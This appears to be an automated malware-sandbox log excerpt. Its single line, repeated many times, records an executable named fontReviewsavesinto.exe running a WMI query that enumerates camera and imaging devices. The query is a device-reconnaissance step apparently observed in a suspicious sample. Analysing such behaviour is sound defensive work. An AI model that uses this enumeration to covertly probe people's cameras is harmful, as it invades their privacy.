                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
